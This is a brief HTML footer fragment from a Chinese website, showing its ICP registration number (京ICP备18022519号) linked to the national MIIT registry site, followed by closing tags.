    <p> 备案号: <a href="https://beian.miit.gov.cn/" title="京ICP备18022519号">京ICP备18022519号</a> </p>

      </div>
  <!--Content ends-->
</footer>